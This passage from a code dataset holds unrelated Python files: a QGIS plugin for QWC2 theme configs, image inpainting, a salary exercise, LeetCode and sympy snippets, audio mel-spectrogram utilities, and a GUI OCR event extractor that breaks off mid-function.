\"QWC2 Theme Manager\", Qgis.Info)\n return\n return open(path, 'r')\n\n def fill_listView(self, themes):\n self.editTheme_button.setEnabled(False)\n self.deleteTheme_button.setEnabled(False)\n self.openProject_button.setEnabled(False)\n self.showQWC2_button.setEnabled(False)\n for index, theme in enumerate(themes):\n if \"title\" in theme.keys():\n self.defaultTheme_comboBox.addItem(theme[\"title\"])\n list_item = QListWidgetItem(theme[\"title\"])\n theme[\"index\"] = index\n list_item.setData(Qt.UserRole, theme)\n self.themes_listWidget.addItem(list_item)\n else:\n if \"url\" not in theme.keys():\n continue\n title = os.path.basename(theme[\"url\"])\n self.defaultTheme_comboBox.addItem(title)\n list_item = QListWidgetItem(title)\n theme[\"index\"] = index\n list_item.setData(Qt.UserRole, theme)\n self.themes_listWidget.addItem(list_item)\n self.themes_listWidget.clearSelection()\n\n def save_themes_config(self):\n config_path = os.path.join(\n self.qwc2Dir_lineEdit.text(), \"themesConfig.json\")\n themes_config = self.read_themes_config(config_path)\n themes_dict = json.load(themes_config)\n themes_config.close()\n if self.defaultScales_lineEdit.text():\n themes_dict[\"defaultScales\"] = [\n int(num.strip()) for num in\n self.defaultScales_lineEdit.text().split(\",\")]\n else:\n themes_dict[\"defaultScales\"] = [1000000, 500000, 250000, 100000,\n 50000, 25000, 10000, 5000, 2500,\n 1000, 500]\n if self.defaultPrintScales_lineEdit.text():\n themes_dict[\"defaultPrintScales\"] = [\n int(num.strip()) for num in\n self.defaultPrintScales_lineEdit.text().split(\",\")]\n else:\n if \"defaultPrintScales\" in themes_dict.keys():\n 
themes_dict.pop(\"defaultPrintScales\")\n if self.defaultPrintResolutions_lineEdit.text():\n themes_dict[\"defaultPrintResolutions\"] = [\n int(num.strip()) for num in\n self.defaultPrintResolutions_lineEdit.text().split(\",\")]\n else:\n if \"defaultPrintResolutions\" in themes_dict.keys():\n themes_dict.pop(\"defaultPrintResolutions\")\n if \"themes\" in themes_dict.keys() and \"items\" in themes_dict[\n \"themes\"].keys():\n for theme in themes_dict[\"themes\"][\"items\"]:\n if \"default\" in theme.keys():\n theme.pop(\"default\")\n if \"title\" in theme.keys():\n if self.defaultTheme_comboBox.currentText() == theme[\n \"title\"]:\n theme[\"default\"] = True\n continue\n elif \"url\" in theme.keys():\n title = os.path.basename(theme[\"url\"])\n if self.defaultTheme_comboBox.currentText() == title:\n theme[\"default\"] = True\n continue\n try:\n themes_config = open(config_path, 'w')\n themes_config.write(json.dumps(themes_dict, indent=2,\n sort_keys=True))\n themes_config.close()\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot create/override themes configuration file\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot \"\n \"create/override file: %s.\" % config_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n self.gen_complete_config()\n self.load_themes_config()\n\n def create_or_edit_theme(self, method):\n if method == \"create\":\n settings_dlg = self.theme_settings_dialog = ThemeSettingsDialog(\n self.iface.mainWindow(), method, self.iface,\n self.defaultTheme_comboBox.count())\n if settings_dlg.exec_() == 1:\n return\n self.load_themes_config()\n self.save_themes_config()\n else:\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n settings_dlg = self.theme_settings_dialog = ThemeSettingsDialog(\n self.iface.mainWindow(), method, self.iface,\n self.defaultTheme_comboBox.count(), theme[0].data(Qt.UserRole))\n if settings_dlg.exec_() == 1:\n return\n self.load_themes_config()\n self.save_themes_config()\n self.enable_publish_button()\n self.gen_complete_config()\n\n def delete_theme(self):\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n\n res = QMessageBox.question(\n None, \"QWC2 Theme Manager\",\n \"Do you really want to delete the selected theme?\")\n if res == QMessageBox.No:\n return\n\n config_path = os.path.join(self.settings.value(\n \"qwc2-themes-manager/qwc2_directory\"), \"themesConfig.json\")\n theme = theme[0].data(Qt.UserRole)\n index = theme.pop(\"index\")\n\n try:\n themes_config = open(config_path, \"r\", encoding=\"utf-8\")\n themes_dict = json.load(themes_config)\n removed_theme = themes_dict[\"themes\"][\"items\"].pop(index)\n themes_config.close()\n themes_config = open(config_path, \"w\", encoding=\"utf-8\")\n themes_config.write(json.dumps(themes_dict, indent=2,\n sort_keys=True))\n themes_config.close()\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot delete the selected theme\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot open/override \"\n \"file: %s.\" % config_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n\n self.load_themes_config()\n self.enable_publish_button()\n self.gen_complete_config()\n\n res = QMessageBox.question(\n 
None, \"QWC2 Theme Manager\",\n \"Do you also want to delete the QGIS project of \"\n \"the deleted Theme?\")\n if res == QMessageBox.No:\n return\n\n try:\n projects_dir_path = os.path.join(self.settings.value(\n \"qwc2-themes-manager/project_directory\"),\n os.path.basename(removed_theme[\"url\"]))\n os.remove(projects_dir_path + \".qgs\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot delete the project\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot Delete the project with \"\n \"the path: %s.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n except FileNotFoundError:\n QgsMessageLog.logMessage(\n \"Delete project Error: The path: %s doesn't \"\n \"exist.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Warning)\n\n def open_project(self):\n theme = self.themes_listWidget.selectedItems()\n if not theme:\n QMessageBox.warning(None, \"QWC2 Theme Manager\",\n \"No theme selected.\")\n return\n project_name = os.path.basename(\n theme[0].data(Qt.UserRole)[\"url\"]) + \".qgs\"\n projects_dir_path = os.path.join(\n self.projectsDir_lineEdit.text(), project_name)\n if os.path.exists(projects_dir_path):\n opened = QgsProject.instance().read(projects_dir_path)\n if not opened:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager\",\n \"Couldn't open the project of the selected theme.\\n\"\n \"Check if you have the needed permissions to \"\n \"open the project.\")\n else:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager\",\n \"Couldn't find the project of the selected theme.\")\n QgsMessageLog.logMessage(\n \"Project Error: Couldn't open project with the\"\n \" path: %s.\" % projects_dir_path,\n \"QWC2 Theme Manager\", Qgis.Warning)\n\n def open_qwc2(self):\n theme = self.themes_listWidget.selectedItems()[0].data(Qt.UserRole)\n url = os.path.join(\n self.qwc2Url_lineEdit.text(), \"?t=\") + os.path.basename(\n theme[\"url\"])\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n webbrowser.open(url)\n\n def reset_ui(self):\n self.defaultScales_lineEdit.setText(\n \"1000000,500000,250000,100000,50000,\"\n \"25000,10000,5000,2500,1000,500\")\n self.defaultPrintScales_lineEdit.setText(\"\")\n self.defaultPrintResolutions_lineEdit.setText(\"\")\n self.defaultTheme_comboBox.clear()\n self.themes_listWidget.clear()\n\n def check_numbers(self, lineEdit):\n numbers_list = lineEdit.text()\n if not numbers_list:\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n self.activate_save_button()\n return\n for number in numbers_list.split(\",\"):\n if number.isdigit():\n continue\n else:\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n self.activate_save_button()\n return\n self.activate_save_button()\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n\n def check_permissions(self, path):\n if not os.path.isdir(path):\n msg = \"This path does not exist\"\n return False, msg\n elif not os.access(path, os.R_OK):\n msg = \"Insufficient permissions(read)\"\n return False, msg\n elif not os.access(path, os.W_OK):\n msg = \"Insufficient permissions(write)\"\n return False, msg\n else:\n return True, None\n\n def enable_publish_button(self):\n if not QgsProject.instance().baseName():\n return\n self.addTheme_button.setEnabled(True)\n for index in range(self.themes_listWidget.count()):\n if os.path.basename(\n self.themes_listWidget.item(\n index).data(Qt.UserRole)[\n \"url\"]) == 
QgsProject.instance().baseName():\n self.addTheme_button.setEnabled(False)\n\n def enable_buttons(self):\n self.editTheme_button.setEnabled(True)\n self.deleteTheme_button.setEnabled(True)\n self.openProject_button.setEnabled(True)\n self.enable_qwc2_button()\n\n def enable_qwc2_button(self):\n if self.qwc2Url_lineEdit.text() and \\\n self.themes_listWidget.selectedItems():\n self.showQWC2_button.setEnabled(True)\n else:\n self.showQWC2_button.setEnabled(False)\n\n def activate_save_button(self):\n notok_style = \"background: #FF7777; color: #FFFFFF;\"\n if self.defaultScales_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n elif self.defaultPrintScales_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n elif self.defaultPrintResolutions_lineEdit.styleSheet() == notok_style:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n else:\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(True)\n\n def gen_complete_config(self):\n if self.themes_listWidget.count() == 0:\n return\n os.chdir(self.qwc2Dir_lineEdit.text())\n script_path = os.path.join(os.path.dirname(__file__),\n \"themesConfig.py\")\n output = subprocess.Popen(['python3', script_path],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n stdout, stderr = output.communicate()\n if stderr.decode(\"utf-8\"):\n QMessageBox.warning(\n None, \"QWC2 Theme Manager\",\n \"Couldn't generate themes.json\\n\"\n \"Please run the script: themesConfig.py manually to generate\"\n \"the themes.json file.\")\n QgsMessageLog.logMessage(\n \"Python execution error: \\n%s\" % stderr.decode(\"utf-8\"),\n \"QWC2 Theme Manager\", Qgis.Critical)\n","repo_name":"HusseinKabbout/qwc2-themes-manager","sub_path":"themes_manager_dockwidget.py","file_name":"themes_manager_dockwidget.py","file_ext":"py","file_size_in_byte":23707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21063596674","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 21:36:36 2019\n\n@author: Nataly\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage import data\nfrom skimage.restoration import inpaint\nimport cv2\n\nfile='00033'\nimage_orig=cv2.imread(file+'.jpg')\n#image_orig=cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n##plt.imshow(image_orig)\n##plt.show()\nmask =cv2.imread(file+'_seg.jpg',0)\n\n#cv2.imshow('',mask)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Defect image over the same region in each color channel\nimage_defect = image_orig.copy()\nfor layer in range(image_defect.shape[-1]):\n image_defect[np.where(mask)] = 0\n\n#plt.imshow(image_defect)\n#plt.show()\nimage_result =inpaint.inpaint_biharmonic(image_orig, mask,multichannel=True)\n\nimage_result =inpaint.inpaint_biharmonic(image_defect, mask, multichannel=3)\n#plt.imshow(image_result)\n#plt.show()\n\n#cv2.imshow('',image_result)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n#\n\nimgs= cv2.normalize(image_result, None, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\ncv2.imshow('',imgs)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\ndire='./'+file+'_inpaiting_B.png'\ncv2.imwrite(dire,imgs)\nk = cv2.waitKey(1000)\ncv2.destroyAllWindows()\n\n","repo_name":"NatalyTinoco/Trabajo-de-grado_Artefactos","sub_path":"Método de 
corrección/test_corrección/inpaitingB.py","file_name":"inpaitingB.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"3580415116","text":"#11. As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contraram para desenvolver o programa que calculará os reajustes.\n\n #Faça um programa que recebe o salário de um colaborador e o reajuste segundo o seguinte critério, baseado no salário atual:\n #salários até R$ 280,00 (incluindo) : aumento de 20%\n #salários entre R$ 280,00 e R$ 700,00 : aumento de 15%\n #salários entre R$ 700,00 e R$ 1500,00 : aumento de 10%\n #salários de R$ 1500,00 em diante : aumento de 5%\n \n #Após o aumento ser realizado, informe na tela:\n #o salário antes do reajuste;\n #o percentual de aumento aplicado;\n #o valor do aumento;\n #o novo salário, após o aumento.\n\nsalarioAtual = float(input(\"Digite o salário atual: \\n\"))\nporcentagem = 0\nsalarioReajuste = salarioAtual\n\nif salarioAtual <= 280:\n porcentagem = 20\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelif 280 < salarioAtual <= 700:\n porcentagem = 15\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelif 700 < salarioAtual <= 1500:\n porcentagem = 10\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\nelse:\n porcentagem = 5\n aumento = salarioAtual * porcentagem / 100\n salarioReajuste = salarioAtual + aumento\n\nprint(\"O salário atual é de R$\" + str(salarioAtual) + \". O aumento será de \" + str(porcentagem) + \"%, que equivale a R$\" + str(aumento) + \". Portanto, o novo salário será de R$\" + str(salarioReajuste) + \".\")","repo_name":"Brunarnm/python_exercicios","sub_path":"02_EstruturaDeDecisão/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33718634353","text":"import os\nimport numpy as np\nimport scipy\nimport librosa\nimport soundfile\nimport matplotlib.pyplot as plt\nimport glob\n\n#########################################################################\n# Some of these functions have been inspired on the DCASE UTIL framework by Toni Heittola\n# https://dcase-repo.github.io/dcase_util/\n#########################################################################\n\n\ndef load_audio_file(file_path, input_fixed_length=0, pextract=None):\n\n try:\n data, source_fs = soundfile.read(file=file_path)\n data = data.T\n except:\n print('ERROR: Soundfile has crashed while reading {}'.format(file_path))\n print('Returning NONE and skipping this file. TO BE REMOVED FROM CSV.')\n return None\n\n # Resample if the source_fs is different from expected\n if pextract.get('fs') != source_fs:\n data = librosa.core.resample(data, source_fs, pextract.get('fs'))\n\n if len(data) > 0:\n data = get_normalized_audio(data)\n else:\n raise ValueError ('File corrupted. Could not open: %s' % file_path)\n # data = np.ones((input_fixed_length, 1))\n # print('File corrupted. 
Could not open: %s' % file_path)\n\n # careful with the shape\n data = np.reshape(data, [-1, 1])\n return data\n\n\n\ndef modify_file_variable_length(data=None, input_fixed_length=0, pextract=None):\n \"\"\"\n data is the entire audio file loaded, with proper shape\n -depending on the loading mode (in pextract)\n --FIX: if sound is short, replicate sound to fill up to input_fixed_length\n if sound is too long, grab only a (random) slice of size input_fixed_length\n --VARUP: short sounds get replicated to fill up to input_fixed_length\n --VARFULL: this function is a by pass (full length is considered, whatever that is)\n\n :return:\n \"\"\"\n\n # deal with short sounds\n if len(data) <= input_fixed_length:\n if pextract.get('load_mode') == 'fix' or pextract.get('load_mode') == 'varup':\n if pextract.get('fill') == 'rep':\n # if file shorter than input_length, replicate the sound to reach the input_fixed_length\n nb_replicas = int(np.ceil(input_fixed_length / len(data)))\n # replicate according to column\n data_rep = np.tile(data, (nb_replicas, 1))\n data = data_rep[:input_fixed_length]\n\n elif pextract.get('fill') == 'zp':\n # if file shorter than input_length, zeropad the sound to reach the input_fixed_length\n data = librosa.util.fix_length(data, input_fixed_length)\n else:\n raise ValueError('unknown filling method')\n\n else:\n # deal with long sounds\n if pextract.get('load_mode') == 'fix':\n # if file longer than input_length, grab input_length from a random slice of the file\n max_offset = len(data) - input_fixed_length\n offset = np.random.randint(max_offset)\n data = data[offset:(input_fixed_length + offset)]\n\n return data\n\ndef get_normalized_audio(y, head_room=0.005):\n\n mean_value = np.mean(y)\n y -= mean_value\n\n max_value = max(abs(y)) + head_room\n return y / max_value\n\n\ndef get_mel_spectrogram(audio, pextract=None):\n \"\"\"Mel-band energies\n\n Parameters\n ----------\n audio : numpy.ndarray\n Audio data.\n params : dict\n Parameters.\n\n Returns\n -------\n feature_matrix : numpy.ndarray\n (log-scaled) mel spectrogram energies per audio channel\n\n \"\"\"\n # make sure rows are channels and columns the samples\n audio = audio.reshape([1, -1])\n window = scipy.signal.hamming(pextract.get('win_length_samples'), sym=False)\n\n mel_basis = librosa.filters.mel(sr=pextract.get('fs'),\n n_fft=pextract.get('n_fft'),\n n_mels=pextract.get('n_mels'),\n fmin=pextract.get('fmin'),\n fmax=pextract.get('fmax'),\n htk=pextract.get('htk'),\n norm=pextract.get('mel_basis_unit'))\n\n if pextract.get('normalize_mel_bands'):\n mel_basis /= np.max(mel_basis, axis=-1)[:, None]\n\n # init mel_spectrogram expressed as features: row x col = frames x mel_bands = 0 x mel_bands (to concatenate axis=0)\n feature_matrix = np.empty((0, pextract.get('n_mels')))\n for channel in range(0, audio.shape[0]):\n spectrogram = get_spectrogram(\n y=audio[channel, :],\n n_fft=pextract.get('n_fft'),\n win_length_samples=pextract.get('win_length_samples'),\n hop_length_samples=pextract.get('hop_length_samples'),\n spectrogram_type=pextract.get('spectrogram_type') if 'spectrogram_type' in pextract else 'magnitude',\n center=True,\n # center=False,\n window=window,\n pextract=pextract\n )\n\n mel_spectrogram = np.dot(mel_basis, spectrogram)\n mel_spectrogram = mel_spectrogram.T\n # at this point we have row x col = time x freq = frames x mel_bands\n\n if pextract.get('log'):\n mel_spectrogram = np.log10(mel_spectrogram + pextract.get('eps'))\n\n feature_matrix = np.append(feature_matrix, mel_spectrogram, 
axis=0)\n\n return feature_matrix\n\n\n\ndef get_spectrogram(y,\n n_fft=1024,\n win_length_samples=0.04,\n hop_length_samples=0.02,\n window=scipy.signal.hamming(1024, sym=False),\n center=True,\n spectrogram_type='magnitude',\n pextract=None):\n\n \"\"\"Spectrogram\n\n Parameters\n ----------\n y : numpy.ndarray\n Audio data\n n_fft : int\n FFT size\n Default value \"1024\"\n win_length_samples : float\n Window length in seconds\n Default value \"0.04\"\n hop_length_samples : float\n Hop length in seconds\n Default value \"0.02\"\n window : array\n Window function\n Default value \"scipy.signal.hamming(1024, sym=False)\"\n center : bool\n If true, input signal is padded so that the frame is centered at hop length\n Default value \"True\"\n spectrogram_type : str\n Type of spectrogram \"magnitude\" or \"power\"\n Default value \"magnitude\"\n\n Returns\n -------\n np.ndarray [shape=(1 + n_fft/2, t), dtype=dtype]\n STFT matrix\n\n \"\"\"\n\n if spectrogram_type == 'magnitude':\n return np.abs(librosa.stft(y + pextract.get('eps'),\n n_fft=n_fft,\n win_length=win_length_samples,\n hop_length=hop_length_samples,\n center=center,\n window=window))\n elif spectrogram_type == 'power':\n return np.abs(librosa.stft(y + pextract.get('eps'),\n n_fft=n_fft,\n win_length=win_length_samples,\n hop_length=hop_length_samples,\n center=center,\n window=window)) ** 2\n else:\n message = 'Unknown spectrum type [{spectrogram_type}]'.format(\n spectrogram_type=spectrogram_type\n )\n raise ValueError(message)\n\n\ndef get_mel_spectrogram_lib(audio, pextract=None):\n\n audio = audio.reshape([1, -1])\n\n window = scipy.signal.hamming(pextract.get('win_length_samples'), sym=False)\n\n mel_spectrogram = librosa.feature.melspectrogram(y=audio[0, :],\n sr=pextract.get('fs'),\n win_length=pextract.get('win_length_samples'),\n hop_length=pextract.get('hop_length_samples'),\n window=window,\n n_fft=pextract.get('n_fft'),\n n_mels=pextract.get('n_mels'),\n center=True,\n # center=False,\n power=2\n ).T\n\n if pextract.get('log'):\n mel_spectrogram = np.log10(mel_spectrogram + pextract.get('eps'))\n\n return mel_spectrogram\n\n\ndef make_sure_isdir(_path):\n \"\"\"\n make sure a directory at the end of pre_path exists. 
Else create it\n :param pre_path:\n :param args:\n :return:\n \"\"\"\n # full_path = os.path.join(pre_path, _out_file)\n if not os.path.exists(_path):\n os.makedirs(_path)\n return _path","repo_name":"edufonseca/uclser20","sub_path":"extract/wav2spec_utils.py","file_name":"wav2spec_utils.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"39"} +{"seq_id":"16479669987","text":"num = int(input(\"Enter a number: \"))\nlst = []\nfinal = {}\nval = []\nfor i in range(num): \n k = input(\"Enter the years: \")\n \n lst.append(k)\n\nfor i in lst:\n k = i[0:2]\n m = k + \"th\"\n if m not in final.keys():\n \n final[m] = [i]\n else:\n \n val = final[m]\n print(val)\n val.append(i)\n final[m] = val\nprint(final)","repo_name":"ikramulkayes/University_Practice","sub_path":"practice25.py","file_name":"practice25.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24033488483","text":"import numpy as np\nimport sympy as sp\n\n# Define the matrix\nA = np.array([[3, 7, 9,],[5, 2, 1,],[-2, -9, 8]])\n\n# Convert the matrix to a SymPy matrix\nA_sym = sp.Matrix(A)\n\n# Convert the matrix to its row echelon form\nrref = A_sym.rref()[0]\n\n# Convert the row echelon form back to a NumPy array\nechelon = np.array(rref.tolist(), dtype=float)\n\n#Rank of matrix\nrank = np.linalg.matrix_rank(A)\n\n# Print the echelon form and rank of the matrix\nprint(\"Echelon form:\\n\", echelon)\nprint(\"Rank:\", rank)","repo_name":"devanshtyagi26/CompMath","sub_path":"Generate the matrix into echelon form and find its rank.py","file_name":"Generate the matrix into echelon form and find its rank.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22646710032","text":"# https://leetcode.com/problems/find-valid-matrix-given-row-and-column-sums/\n\nfrom typing import List\n\n\nclass Solution:\n def restoreMatrix(self, rowSum: List[int], colSum: List[int]) -> List[List[int]]:\n matrix = [[0] * len(colSum) for _ in range(len(rowSum))]\n while sum(rowSum + colSum) > 0:\n min_row_val = 1e9\n min_row_index = -1\n min_col_val = 1e9\n min_col_index = -1\n for i in range(len(rowSum)):\n if rowSum[i] != 0 and rowSum[i] < min_row_val:\n min_row_val = rowSum[i]\n min_row_index = i\n for i in range(len(colSum)):\n if colSum[i] != 0 and colSum[i] < min_col_val:\n min_col_val = colSum[i]\n min_col_index = i\n if min_row_val <= min_col_val:\n matrix[min_row_index][min_col_index] = min_row_val\n rowSum[min_row_index] = 0\n colSum[min_col_index] -= min_row_val\n else:\n matrix[min_row_index][min_col_index] = min_col_val\n colSum[min_col_index] = 0\n rowSum[min_row_index] -= min_col_val\n return matrix\n\n\nprint(Solution().restoreMatrix([3, 8], [4, 7]))\n","repo_name":"GeorgianBadita/LeetCode","sub_path":"medium/FindValidMatrixGivenRowAndColumnSums.py","file_name":"FindValidMatrixGivenRowAndColumnSums.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73378855153","text":"import cv2\nimport numpy as np\nimport imutils\nimport glob\nimport re\nimport os\nimport pytesseract\nfrom pytesseract import image_to_string\nfrom PIL import Image, ImageEnhance, ImageFilter\n\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program 
Files\\Tesseract-OCR\\tesseract.exe'\n\n'''\n\tnotes:\n\t\t-\tfor get_evet, if OCR does not work propperly, continue to preprocess image. \n\t\t\t\tlink: https://medium.freecodecamp.org/getting-started-with-tesseract-part-ii-f7f9a0899b3f\n'''\n\n\ndef get_event(frame, elements, elements_coord, key, functions, types, input_fields_path):\n text_size = 150\n\n if key in functions:\n function_name = functions[key][0]\n event = function_name + '('\n\n parameters = functions[key][1:]\n for param in parameters:\n if types[param] == 'TextField': # get text in text area\n empty_field = elements[param]\n empty_field = process_image_for_OCR(empty_field, scale_factor=5, filter='bilateralFilter')\n empty_field_text = image_to_string(empty_field, lang='eng')\n split_empty_field_text = re.split(' |\\n', empty_field_text)\n print('---')\n print(split_empty_field_text)\n\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n field_image = process_image_for_OCR(field_image, scale_factor=4)\n field_string = image_to_string(field_image, lang='eng')\n split_field_text = re.split(' |\\n', field_string)\n print(split_field_text)\n print('---')\n\n diff = list_diff(split_field_text, split_empty_field_text)\n text = ' '.join(diff)\n # processed_string = field_string.split(' ')\n # print param + ' - ' + processed_string\n event = event + text + ', '\n\n if types[param] == 'RadioButton': # get text after the checked radio button\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n radio_on = cv2.imread(os.path.join(input_fields_path, 'RadioButton_on.png'))\n print('========================== get_event =====================')\n print(radio_on)\n print('========================== end get_event =================')\n\n (startX, startY, endX, endY) = find_element(field_image, radio_on)\n\n textbox_startX, textbox_startY = endX, startY\n textbox_endX, textbox_endY = endX + text_size, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n # cv2.imwrite('image_of_text.png',text_image)\n text_image = process_image_for_OCR(text_image, scale_factor=2)\n text_string = image_to_string(text_image, lang='eng')\n # cv2.imshow('img',text_image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n event = event + text_string + ', '\n\n if types[param] == 'CheckBox':\n options = []\n\n (startX, startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n checkbox_on = cv2.imread(os.path.join(input_fields_path, 'CheckBox_on.png'))\n (startX, startY, endX, endY) = find_element(field_image, checkbox_on)\n\n while (startX, startY, endX, endY) != (0, 0, 0, 0):\n textbox_startX, textbox_startY = endX, startY\n textbox_endX, textbox_endY = endX + text_size, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n # cv2.rectangle(field_image, (textbox_startX, textbox_startY), (textbox_endX, textbox_endY), (51, 255, 153), 3)\n # cv2.imshow('img',field_image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n image = process_image_for_OCR(text_image, scale_factor=3)\n text_string = image_to_string(image, lang='eng')\n options.append(text_string)\n field_image[startY:endY, startX:endX] = (0, 0, 0)\n (startX, startY, endX, endY) = find_element(field_image, checkbox_on)\n\n param_value = ''\n for option in options:\n param_value = param_value + ' ' + option\n\n event = event + param_value + ', '\n\n if types[param] == 'PopUp':\n (startX, 
startY), (endX, endY) = elements_coord[param]\n field_image = frame[startY:endY, startX:endX]\n\n popup_icon = cv2.imread(os.path.join(input_fields_path, 'PopUp_on.png'))\n (startX, startY, endX, endY) = find_element(field_image, popup_icon)\n\n textbox_startX, textbox_startY = startX - text_size, startY\n textbox_endX, textbox_endY = startX, endY\n text_image = field_image[textbox_startY:textbox_endY, textbox_startX:textbox_endX]\n text_image = process_image_for_OCR(text_image, scale_factor=2)\n text_string = image_to_string(text_image, lang='eng')\n\n event = event + text_string + ', '\n\n if len(parameters) > 0:\n event = event[:-2]\n event = event + ')'\n return event\n\n else:\n return None\n\n\ndef process_image_for_OCR(image, scale_factor, filter='GaussianBlur'):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.resize(image, None, fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_CUBIC)\n # image = cv2.GaussianBlur(image, (5, 5), 0)\n if filter == 'bilateralFilter':\n image = cv2.bilateralFilter(image, 9, 75, 75)\n if filter == 'GaussianBlur':\n image = cv2.GaussianBlur(image, (5, 5), 0)\n image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n # pil_img = Image.fromarray(image)\n return image\n\n\ndef list_diff(l1, l2):\n for i in l2:\n if i in l1:\n l1.remove(i)\n return l1\n\n\n# def process_image_for_ocr(image,factor):\n# # TODO : Implement using opencv\n# image = set_image_dpi(image,factor)\n# image = remove_noise_and_smooth(image)\n# return image\n\n\n# def set_image_dpi(image, factor):\n# length_x, width_y, _ = image.shape \n# size = factor * length_x, factor * width_y\n# # size = (1800, 1800)\n# im_resized = cv2.resize(image, None, fx=factor, fy=factor, interpolation=cv2.INTER_CUBIC)\n# return im_resized\n\n\n# def image_smoothening(image):\n# ret1, th1 = cv2.threshold(image, BINARY_THREHOLD, 255, cv2.THRESH_BINARY)\n# ret2, th2 = cv2.threshold(th1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# blur = cv2.GaussianBlur(th2, (1, 1), 0)\n# ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# return th3\n\n\n# def remove_noise_and_smooth(image):\n# filtered = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41, 3)\n# kernel = np.ones((1, 1), np.uint8)\n# opening = cv2.morphologyEx(filtered, cv2.MORPH_OPEN, kernel)\n# closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n# image = image_smoothening(image)\n# or_image = cv2.bitwise_or(image, closing)\n# return or_image\n\ndef get_elements_type(elements):\n types = dict()\n\n for eid in elements.keys():\n types[eid] = eid[eid.find('_') + 1:]\n\n return types\n\n\ndef check_keyframe(frame, old_frame, threshold):\n diff = cv2.absdiff(frame, old_frame)\n non_zeros = np.count_nonzero(diff > 3)\n if non_zeros > threshold:\n return 1\n else:\n return 0\n\n\ndef load_pages(file_name):\n pages = dict()\n # added .lower()\n with open(file_name, \"r\") as input_file:\n for line in input_file:\n string_list = [s.replace('\\n', '') for s in line.split(' ')]\n pages[string_list[0]] = string_list[1:]\n\n return pages\n\n\ndef get_current_page(elements_coord, pages):\n all_pages = set()\n\n for page in pages.values():\n all_pages = all_pages.union(page)\n\n for eid in elements_coord.keys():\n if 